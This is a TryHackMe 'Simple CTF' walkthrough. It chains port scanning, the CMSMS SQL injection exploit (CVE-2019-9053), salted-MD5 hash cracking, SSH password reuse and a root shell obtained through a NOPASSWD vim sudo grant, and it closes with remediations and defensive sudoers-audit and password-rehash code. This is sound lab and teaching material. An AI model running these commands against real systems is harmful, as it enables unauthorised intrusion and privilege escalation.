Today's problem is: https://tryhackme.com/room/easyctf
Challenge Overview:
Machine: Simple CTF (THM)
Path: Enumeration -> CMSMS SQL Injection (CVE-2019-9053) -> Hash Extraction & Cracking -> SSH Password Reuse -> Misconfigured Sudo (vim NOPASSWD) -> Root Shell
Key Takeaway: Outdated web applications, weak password hashing with credential reuse, and overly permissive sudo configurations can be chained together to escalate from web exploitation to full root compromise.
The following entry was added to the /etc/hosts file to simplify hostname-based interaction with the target system:
<TARGET_IP> easy.thm
The initial enumeration phase was started by performing a full port scan against the target machine using Nmap. The following commands were executed to identify open ports and active services:
nmap -p- --open <TARGET_IP>
nmap -sC -sV -p <OPEN_PORTS> <TARGET_IP>
┌──(root㉿vbox)-[~]
└─# nmap -p- --open easy.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 16:09 IST
Nmap scan report for easy.thm (10.48.152.251)
Host is up (0.086s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 523.34 seconds
┌──(root㉿vbox)-[~]
└─# nmap -sC -sV -p 21,80,2222 easy.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 16:26 IST
Nmap scan report for easy.thm (10.48.152.251)
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.149.224
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.78 seconds
The scan revealed that FTP, HTTP and SSH services were running on ports 21, 80 and 2222 respectively.
The scan results revealed that an anonymous FTP login was enabled. As no login credentials were present, further enumeration focused on publicly accessible services, i.e., FTP and HTTP.
The FTP service did not reveal any useful information, as it continuously attempted to establish data connections over dynamically allocated ports, which were blocked.
Repeated attempts to list directory contents resulted in connection timeouts. Passive and active modes were toggled, but the issue persisted. Consequently, FTP enumeration was abandoned and treated as a rabbit hole.
┌──(root㉿vbox)-[~]
└─# ftp easy.thm
Connected to easy.thm.
220 (vsFTPd 3.0.3)
Name (easy.thm:root): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||44465|)
ls -la
^C
receive aborted. Waiting for remote to finish abort.
ftp> ls -la
229 Entering Extended Passive Mode (|||41611|)
ftp: Can't connect to `10.48.152.251:41611': Connection timed out
200 EPRT command successful. Consider using EPSV.
^C
421 Service not available, user interrupt. Connection closed.
ftp> passive
Passive mode: on; fallback to active mode: on.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
Not connected.
ftp> ls -la
Not connected.
ftp> exit
A directory enumeration scan was performed against the HTTP service using Gobuster to identify any hidden or restricted endpoints.
┌──(root㉿vbox)-[~]
└─# gobuster dir -u http://easy.thm/ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://easy.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 305] [--> http://easy.thm/simple/]
/server-status (Status: 403) [Size: 296]
Progress: 220557 / 220557 (100.00%)
===============================================================
Finished
===============================================================
The endpoint /simple was discovered.
The main webpage displayed the default Ubuntu Apache page; however, the /simple endpoint revealed that the CMS in use was CMS Made Simple (CMSMS) version 2.2.8, which is vulnerable to SQL injection (CVE-2019-9053).
Details regarding this vulnerability are available in the Exploit Database. The exploit code provided there was saved as code.py.
The exploit was executed using:
python2 code.py -u "http://easy.thm/simple/" -w /usr/share/wordlists/rockyou.txt
The -crack option may also be used, but it consumes significant time. It was therefore more efficient to extract the hash and crack it using Hashcat.
The exploit revealed:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: {REDACTED}
The output revealed a username, the user's email address and the salted password hash.
The hash and salt were saved in a file named hash.txt, and Hashcat was executed:
┌──(root㉿vbox)-[~/Desktop/easy]
└─# cat hash.txt
<HASH>:<SALT>
┌──(root㉿vbox)-[~/Desktop/easy]
└─# hashcat -m 20 hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344389
* Bytes.....: 139921538
* Keyspace..: 14344389
<HASH>:1dac0d92e9fa6bb2:{REDACTED}
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: <HASH>:1dac0d92e9fa6bb2
Time.Started.....: Sun Feb 15 17:45:27 2026 (0 secs)
Time.Estimated...: Sun Feb 15 17:45:27 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 1430.1 kH/s (0.44ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7168/14344389 (0.05%)
Rejected.........: 0/7168 (0.00%)
Restore.Point....: 0/14344389 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: armando -> hola123
Hardware.Mon.#01.: Util: 13%
Started: Sun Feb 15 17:45:14 2026
Stopped: Sun Feb 15 17:45:28 2026
The password for the user mitch was successfully recovered. This demonstrated classic password reuse, as the recovered CMS password was valid for SSH access.
SSH login was performed on port 2222, and then the shell was stabilized using:
python3 -c 'import pty; pty.spawn("/bin/bash")'
┌──(root㉿vbox)-[~/Desktop/easy]
└─# ssh mitch@easy.thm -p 2222
The authenticity of host '[easy.thm]:2222 ([10.48.152.251]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:16: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[easy.thm]:2222' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
mitch@easy.thm's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
mitch@Machine:~$ whoami
mitch
The user flag can be obtained from the "/home/mitch" directory:
mitch@Machine:~$ ls
user.txt
mitch@Machine:~$ cat user.txt
<<USER_FLAG>>
mitch@Machine:~$
Enumeration of the /home directory revealed another user named sunbath.
mitch@Machine:~$ cd /home
mitch@Machine:/home$ ls
mitch sunbath
For privilege escalation, the sudo permissions of mitch were enumerated:
sudo -l
mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
It was determined that the user could execute vim with sudo privileges without being asked for a password. This is a classic privilege escalation vector, since vim can run shell commands from inside the editor.
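The defender's counterpart to the sudo -l check above is to audit sudoers for exactly this pattern before an attacker does. The following Python is an added example, not part of the original writeup: it parses entries in sudoers syntax (a constructed sample modelled on the mitch entry shown), honours sudo's rule that a NOPASSWD/PASSWD tag carries over to later commands in the same entry, and flags grants of ALL or of editors that offer a shell escape. The editor list is an assumed starter set (the page demonstrates vim only), and the suggested fix, granting sudoedit on specific files rather than the editor binary, is sudo's standard mechanism for editing files without running an editor as root.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Assumed starter list of interactive editors that can run a shell from inside
# the editor (the page demonstrates vim; the rest are an assumption).
SHELL_ESCAPE_EDITORS = {"vim", "vi", "nano", "ed"}

# Tags that may precede a command in a sudoers Cmnd_Spec. A tag stays in effect
# for the following commands of the same entry until its opposite appears.
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)
# user host=(runas) commands; the (runas) part is optional and defaults to root
ENTRY_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

# Constructed sample sudoers, modelled on the 'sudo -l' result shown for mitch.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /usr/bin/vi
deploy  ALL=(root) /usr/bin/systemctl restart app
"""


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    reason: str

    def recommendation(self) -> str:
        if self.command == "ALL":
            return "replace ALL with an explicit, minimal command list"
        fix = "grant 'sudoedit <file>' for the specific files instead of the editor binary"
        return fix + ("; drop NOPASSWD" if self.nopasswd else "")


def parse_command_list(cmds: str) -> List[Tuple[bool, str]]:
    """Split a Cmnd_Spec_List into (nopasswd, command) pairs, with tag inheritance."""
    result = []
    nopasswd = False
    for item in cmds.split(","):
        item = item.strip()
        while True:  # strip chained tags such as 'NOPASSWD: SETENV: /usr/bin/vim'
            m = TAG_RE.match(item)
            if not m:
                break
            if m.group(1) == "NOPASSWD":
                nopasswd = True
            elif m.group(1) == "PASSWD":
                nopasswd = False
            item = item[m.end():]
        result.append((nopasswd, item))
    return result


def audit_sudoers(text: str) -> List[Finding]:
    """Return every grant that is ALL or an editor with a known shell escape."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(
            ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
        ):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"  # sudoers default when (runas) is omitted
        for nopasswd, cmd in parse_command_list(m.group("cmds")):
            binary = cmd.split()[0] if cmd else ""
            name = binary.rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append(Finding(m.group("user"), runas, cmd, nopasswd,
                                        "ALL grants every command"))
            elif name in SHELL_ESCAPE_EDITORS:
                findings.append(Finding(m.group("user"), runas, cmd, nopasswd,
                                        f"{name} can run a shell from inside the editor"))
    return findings


def high_risk(findings: List[Finding]) -> List[Finding]:
    """NOPASSWD grants turn a reused password into root with no further hurdle."""
    return [f for f in findings if f.nopasswd]


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        level = "HIGH" if f.nopasswd else "MEDIUM"
        print(f"[{level}] {f.user} -> ({f.runas}) {f.command}: {f.reason}; fix: {f.recommendation()}")
```

Run against the sample, the mitch entry is the only HIGH finding; the backup user's vi grant is reported at MEDIUM because the PASSWD tag re-enables the password prompt, and the rsync and systemctl grants are not reported at all.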
A root shell was spawned using:
mitch@Machine:~$ sudo /usr/bin/vim -c ':!/bin/bash'
root@Machine:~# whoami
root
The root flag can be obtained from the "/root" directory:
root@Machine:~# cd /root
root@Machine:/root# ls
root.txt
root@Machine:/root# cat root.txt
<<<ROOT_FLAG>>> !!!
Remediations:
- Upgrade CMS Made Simple to a patched version (≥ 2.2.10) and apply input sanitization and prepared statements to eliminate SQL injection vulnerabilities such as CVE-2019-9053.
- Disable anonymous FTP access on vsftpd and restrict unnecessary services to prevent unauthenticated enumeration and reduce the external attack surface.
- Enforce strong password policies and prohibit password reuse across services (CMS and SSH), and replace legacy MD5-based hashing with modern adaptive hashing algorithms such as bcrypt or Argon2.
- Restrict sudo privileges by removing NOPASSWD access to /usr/bin/vim, as interactive editors allow shell escapes and direct root shell spawning.
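The Hashcat step earlier (mode 20, md5($salt.$pass), reported at about 1430 kH/s in the run shown) and the third remediation above make the same point: one fast hash per guess lets an entire wordlist be tested cheaply. The following Python is an added example, not part of the original writeup or of CMS Made Simple. It reproduces the legacy record layout the page used in hash.txt (<hash>:<salt>, with md5(salt + password)), verifies a password against it, and shows a login-time migration to a slow, salted KDF. hashlib.scrypt is used as a standard-library stand-in for the bcrypt or Argon2 named in the remediation; the salt is the one shown on the page, while the password and the resulting hash are constructed.

```python
import hashlib
import hmac
import secrets
import time

# Constructed sample values: the page shows this salt but redacts the hash, so
# the password (and therefore the hash) used here is invented for the example.
SAMPLE_SALT = "1dac0d92e9fa6bb2"
SAMPLE_PASSWORD = "correct-horse-battery"

# Work factor for the replacement scheme (hashlib.scrypt as a standard-library
# stand-in for the bcrypt/Argon2 named in the remediation).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def legacy_hash(salt: str, password: str) -> str:
    """md5($salt.$pass): the scheme hashcat mode 20 targets; one MD5 per guess."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def legacy_record(salt: str, password: str) -> str:
    """Store in the '<hash>:<salt>' layout the page used for hash.txt."""
    return f"{legacy_hash(salt, password)}:{salt}"


def legacy_verify(stored: str, password: str) -> bool:
    digest, salt = stored.split(":", 1)
    return hmac.compare_digest(digest, legacy_hash(salt, password))


def hardened_hash(password: str, salt: bytes = None) -> str:
    """scrypt with a fresh 16-byte salt; the parameters travel with the record."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.scrypt(password.encode(), salt=salt,
                        n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${dk.hex()}"


def hardened_verify(stored: str, password: str) -> bool:
    scheme, n, r, p, salt_hex, dk_hex = stored.split("$")
    if scheme != "scrypt":
        return False
    dk = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                        n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(dk.hex(), dk_hex)


def verify_and_migrate(record: dict, password: str) -> bool:
    """Accept either scheme at login; rehash a legacy record once the password is known good."""
    stored = record["hash"]
    if stored.startswith("scrypt$"):
        return hardened_verify(stored, password)
    if legacy_verify(stored, password):
        record["hash"] = hardened_hash(password)
        return True
    return False


def per_guess_cost(fn, trials: int) -> float:
    start = time.perf_counter()
    for _ in range(trials):
        fn()
    return (time.perf_counter() - start) / trials


def cost_ratio() -> float:
    """How many times slower a single guess is under scrypt than under md5($salt.$pass)."""
    salt = secrets.token_bytes(16)
    legacy = per_guess_cost(lambda: legacy_hash(SAMPLE_SALT, "guess"), 2000)
    hardened = per_guess_cost(lambda: hardened_hash("guess", salt), 5)
    return hardened / max(legacy, 1e-9)


if __name__ == "__main__":
    user = {"hash": legacy_record(SAMPLE_SALT, SAMPLE_PASSWORD)}
    print("legacy record :", user["hash"])
    print("login ok      :", verify_and_migrate(user, SAMPLE_PASSWORD))
    print("migrated to   :", user["hash"][:48], "...")
    print(f"one guess costs roughly {cost_ratio():.0f}x more under scrypt")
```

The migration path matters because a CMS upgrade alone does not rehash existing rows: with verify_and_migrate in the login handler, every account is moved to the slow scheme the next time its owner signs in, and hmac.compare_digest keeps both verifiers constant-time.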
We are done with the machine.
Let's move on to the next one; till then, have a good day (or night).